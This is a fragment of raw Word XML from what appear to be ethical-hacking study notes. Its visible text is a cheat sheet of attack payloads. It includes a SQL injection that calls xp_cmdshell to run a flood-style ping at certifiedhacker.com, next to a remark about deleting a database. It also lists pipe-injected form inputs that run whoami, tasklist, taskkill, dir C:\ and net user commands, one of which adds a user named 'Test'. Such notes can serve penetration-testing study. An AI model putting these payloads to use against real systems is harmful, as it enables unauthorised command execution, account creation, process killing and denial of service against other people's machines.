        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidR="001B47DA" w:rsidRPr="002B38D7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001B47DA" w:rsidRPr="002B38D7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidR="001B47DA" w:rsidRPr="002B38D7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>(If no error message is displayed, we have deleted a database)</w:t>
      </w:r>
      <w:r w:rsidR="001B47DA" w:rsidRPr="002B38D7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001B47DA" w:rsidRPr="002B38D7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001B47DA" w:rsidRPr="002B38D7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>blah';exec master..xp_cmdshell '</w:t>
      </w:r>
      <w:r w:rsidR="001B47DA" w:rsidRPr="002B38D7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>ping</w:t>
      </w:r>
      <w:r w:rsidR="001B47DA" w:rsidRPr="002B38D7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001B47DA" w:rsidRPr="002B38D7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>www.certifiedhacker.com -l 65000 -t</w:t>
      </w:r>
      <w:r w:rsidR="001B47DA" w:rsidRPr="002B38D7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>'; --</w:t>
      </w:r>
      <w:r w:rsidR="002B38D7" w:rsidRPr="002B38D7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidR="002B38D7" w:rsidRPr="002B38D7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>(Will use the SQL database to run commands)</w:t>
      </w:r>
      <w:r w:rsidR="002B38D7">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B4C1AE" w14:textId="77777777" w:rsidR="003F50AF" w:rsidRDefault="003F50AF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="17205A6F" w14:textId="2BABDDA1" w:rsidR="003F50AF" w:rsidRDefault="003F50AF" w:rsidP="003F50AF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Scripts and Information: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AE39DF" w14:textId="77777777" w:rsidR="003F50AF" w:rsidRDefault="003F50AF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30141088" w14:textId="7CDB5E19" w:rsidR="00C831BD" w:rsidRPr="00DF08BE" w:rsidRDefault="003F50AF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F50AF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>If inputting user text in a form, try:</w:t>
      </w:r>
      <w:r w:rsidRPr="003F50AF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003F50AF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003F50AF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>| hostname</w:t>
      </w:r>
      <w:r w:rsidRPr="003F50AF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003F50AF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003F50AF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003F50AF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>(May return the name of the machine)</w:t>
      </w:r>
      <w:r w:rsidRPr="003F50AF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003F50AF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003F50AF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>|whoami</w:t>
      </w:r>
      <w:r w:rsidRPr="003F50AF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003F50AF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003F50AF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003F50AF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>(May return the user, group and privileges information for current user)</w:t>
      </w:r>
      <w:r w:rsidRPr="003F50AF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003F50AF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003F50AF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>| tasklisit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003F50AF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>(May return a list of all the running processes on the machine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>, note down any PID’s</w:t>
      </w:r>
      <w:r w:rsidRPr="003F50AF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00DF08BE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">| taskkill </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF08BE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>/PID /F</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF08BE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00DF08BE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:tab/>
        <w:t>(May forcefully</w:t>
      </w:r>
      <w:r w:rsidR="00DF08BE" w:rsidRPr="00DF08BE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF08BE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>/F</w:t>
      </w:r>
      <w:r w:rsidR="00DF08BE" w:rsidRPr="00DF08BE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">, kill the associated task with the PID number, </w:t>
      </w:r>
      <w:r w:rsidR="00DF08BE" w:rsidRPr="00DF08BE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>/PID</w:t>
      </w:r>
      <w:r w:rsidR="00DF08BE" w:rsidRPr="00DF08BE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00DF08BE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00DF08BE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00DF08BE" w:rsidRPr="00DF08BE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">| dir </w:t>
      </w:r>
      <w:r w:rsidR="00DF08BE" w:rsidRPr="00DF08BE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>C:\</w:t>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sidRPr="00DF08BE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">(May return the files and directories on the </w:t>
      </w:r>
      <w:r w:rsidR="00DF08BE" w:rsidRPr="00DF08BE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\ </w:t>
      </w:r>
      <w:r w:rsidR="00DF08BE" w:rsidRPr="00DF08BE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>drive)</w:t>
      </w:r>
      <w:r w:rsidR="00DF08BE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00DF08BE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00DF08BE" w:rsidRPr="00DF08BE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>| net</w:t>
      </w:r>
      <w:r w:rsidR="00DF08BE" w:rsidRPr="00DF08BE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> user</w:t>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Pr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>(May return user account information from the machine)</w:t>
      </w:r>
      <w:r w:rsidR="00DF08BE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00DF08BE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00DF08BE" w:rsidRPr="00DF08BE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">| net </w:t>
      </w:r>
      <w:r w:rsidR="00DF08BE" w:rsidRPr="00DF08BE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">user </w:t>
      </w:r>
      <w:r w:rsidR="00DF08BE" w:rsidRPr="00DF08BE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">Test </w:t>
      </w:r>
      <w:r w:rsidR="00DF08BE" w:rsidRPr="00DF08BE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>/Add</w:t>
      </w:r>
      <w:r w:rsidR="00DF08BE" w:rsidRPr="00DF08BE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00DF08BE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00DF08BE" w:rsidRPr="00DF08BE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">(May add a new user, called </w:t>
      </w:r>
      <w:r w:rsidR="00DF08BE" w:rsidRPr="00DF08BE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>Test</w:t>
      </w:r>
      <w:r w:rsidR="00DF08BE" w:rsidRPr="00DF08BE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00DF08BE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00DF08BE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00DF08BE" w:rsidRPr="005D5190">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">| net </w:t>
      </w:r>
      <w:r w:rsidR="00DF08BE" w:rsidRPr="005D5190">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">user </w:t>
      </w:r>
      <w:r w:rsidR="00DF08BE" w:rsidRPr="005D5190">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>Test</w:t>
      </w:r>
      <w:r w:rsidR="00DF08BE" w:rsidRPr="005D5190">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:color w:val="00B050"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00DF08BE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00DF08BE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00DF08BE" w:rsidRPr="005D5190">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>(May reveal the account’s information)</w:t>
